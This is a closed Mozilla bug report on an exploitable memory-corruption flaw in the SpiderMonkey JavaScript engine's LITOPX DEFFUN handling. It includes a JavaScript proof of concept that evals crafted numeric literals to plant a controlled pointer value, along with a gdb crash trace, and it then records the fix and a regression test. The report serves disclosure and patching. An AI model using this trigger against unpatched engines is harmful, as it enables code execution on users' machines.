Closed Bug 364023 Opened 18 years ago Closed 18 years ago

LITOPX DEFFUN is exploitable

Component: Core :: JavaScript Engine (defect)
Priority: Not set
Severity: critical
Status: VERIFIED FIXED

Reporter: sync2d, Assigned: sync2d

Keywords: crash, verified1.8.0.10, verified1.8.1.2
Whiteboard: [sg:critical] security tracker for bug 363988

Attachments (1 file)

$ cat litopx-deffun-x.txt
function exploit() {
    var code = "";
    // 0x10000 void statements, each with a distinct numeric literal
    for(var i = 0; i < 0x10000; i++) {
        if(i == 125) {
            code += "void 0x10000050505050;\n";
        } else {
            code += "void " + (0x10000000000000 + i) + ";\n";
        }
    }
    // a function definition after the literals
    code += "function foo() {}\n";
    eval(code);
}
exploit();
$ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298
2298        JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127, 1127219200, 128}, dslots = 0x43300000}

In other words, bug 363988 is exploitable.
Flags: blocking1.8.1.2+
Flags: blocking1.8.0.10+
Whiteboard: [sg:critical] security tracker for bug 363988
shutdown contributed a patch for bug 363988
Assignee: general → shutdown
Fix landed for bug 363988. /be
Status: NEW → RESOLVED
Closed: 18 years ago
Resolution: --- → FIXED
Flags: in-testsuite+
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Status: RESOLVED → VERIFIED
Group: security
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v <-- regress-364023.js initial revision: 1.1